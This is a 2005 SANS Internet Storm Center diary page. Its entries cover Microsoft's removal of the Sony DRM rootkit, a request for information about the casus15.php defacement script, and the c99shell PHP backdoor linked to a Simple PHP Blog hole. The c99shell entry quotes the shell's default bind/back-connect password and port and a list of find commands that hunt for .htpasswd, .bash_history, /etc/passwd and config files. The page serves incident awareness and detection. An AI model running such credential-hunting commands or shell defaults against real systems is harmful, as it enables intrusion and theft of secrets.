
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-11-13



Sony DRM Rootkit to be removed automatically by Microsoft

Published: 2005-11-13
Last Updated: 2005-11-13 14:36:09 UTC
by Patrick Nolan (Version: 1)
Microsoft says "Rootkits have a clearly negative impact on not only the security, but also the reliability and performance of their systems" "and have determined that in order to help protect our customers we will add a detection and removal signature for the rootkit component of the XCP software".

"Brian Krebs on Computer Security" also covered it here.

php - a defacement file information request

Published: 2005-11-13
Last Updated: 2005-11-13 02:03:40 UTC
by Patrick Nolan (Version: 4)
A while back casus15.php was being found on a number of servers. According to one source at the time, "It's a script that was created to execute system commands on your server using the system() function." If you're running into casus15.php, please drop us a note on your determination of how it was installed on your network.

casus15.php has shown up a few times at Zone-H DIGITAL ATTACKS ARCHIVE.

Googlebot's cached capture of one affected system also recorded an SSH connection; scroll to the bottom and note:
_ENV["SSH_CONNECTION"] 200.74.99.107 4172 217.160.240.17 22

Thanks!

PHP/BackDoor.gen

Published: 2005-11-13
Last Updated: 2005-11-13 02:00:53 UTC
by Patrick Nolan (Version: 1)
McAfee has developed a generic detection, PHP/BackDoor.gen. They say it's a detection for a "remote access trojan written in PHP scripting language."

One use of it happened at and is described here, and says:

"The attack came about because of major security hole in the Simple PHP Blog that was being used in political subdomain of the Nos site. The security hole allowed for an outside CGI script injection that revealed the login and password for the blog. From there, the hacker used the c99shell.php (v.1.0 pre-release build #13) script, which while not allowing direct admin access to the server and its modules, allows for deletion of basically all common and not so common files from the root level all the way down. So, this is why everything was gone from the site, as the hacker just deleted everything from the server itself.

I went to blog author's site and saw that several other people have also suffered the same fate, although in their cases it was generally only the blog itself that was hacked as that was all they were using on their site. In any case, I did let them have a piece of my mind and basically said that anything that is that wide open should not even be released as an alpha version, much less beta.

I went over my data logs and was able to easily obtain the hacker's IP address as well as all activity on the site. Their host, ISP and the FBI will be contacted this week about this intrusion.

I urge everyone who is using Simple PHP Blog to remove it from your server and use a more secure blog, such as Serendipity."

Not included in the McAfee write-up of their version of c99shell.txt is some basic default information (from c99shell.php v.1.0 pre-release build #16):

xxxxx

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

xxxxx

$bindport_pass = "c99";      // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

xxxxx

   all suid files", "find / -type f -perm -04000 -ls
   suid files in current dir", "find . -type f -perm -04000 -ls
   all sgid files", "find / -type f -perm -02000 -ls
   sgid files in current dir", "find . -type f -perm -02000 -ls
   config.inc.php files", "find / -type f -name config.inc.php
   config* files", "find / -type f -name \"config*\"
   config* files in current dir", "find . -type f -name \"config*\"
   all writable folders and files", "find / -perm -2 -ls"),
   all writable folders and files in current dir", "find . -perm -2 -ls
   all service.pwd files", "find / -type f -name service.pwd
   service.pwd files in current dir", "find . -type f -name service.pwd
   all .htpasswd files", "find / -type f -name .htpasswd
   .htpasswd files in current dir", "find . -type f -name .htpasswd
   all .bash_history files", "find / -type f -name .bash_history
   .bash_history files in current dir", "find . -type f -name .bash_history
   all .fetchmailrc files", "find / -type f -name .fetchmailrc
   .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc
   list file attributes on a Linux second extended file system", "lsattr -va
   show opened ports", "netstat -an | grep -i listen

xxxxx

Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.

xxxxx

echo "<b>Ftp Quick brute:</b><br>";
 if (!win) {echo "This functions not work in Windows!<br><br>";}

xxxxx

Simple PHP Blog vulnerability and patch link at Secunia.
